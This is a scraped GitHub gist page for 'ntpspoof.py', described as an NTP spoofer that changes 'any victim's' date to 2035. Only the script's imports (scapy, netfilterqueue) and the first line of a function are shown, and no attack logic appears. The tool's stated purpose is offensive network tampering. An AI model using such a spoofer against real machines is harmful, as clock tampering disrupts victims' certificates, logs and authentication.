Skip to content

Instantly share code, notes, and snippets.

View iteufel's full-sized avatar
🚀

Allan Amstadt iteufel

🚀
View GitHub Profile
@Dbof
Dbof / ntpspoof.py
Last active August 16, 2022 14:11
NTP spoofer to change the date of any victim to the year 2035
import os
import sys
import time
from subprocess import Popen, DEVNULL
import datetime
from scapy.all import IP, UDP, NTP
from netfilterqueue import NetfilterQueue
def get_switch_ip():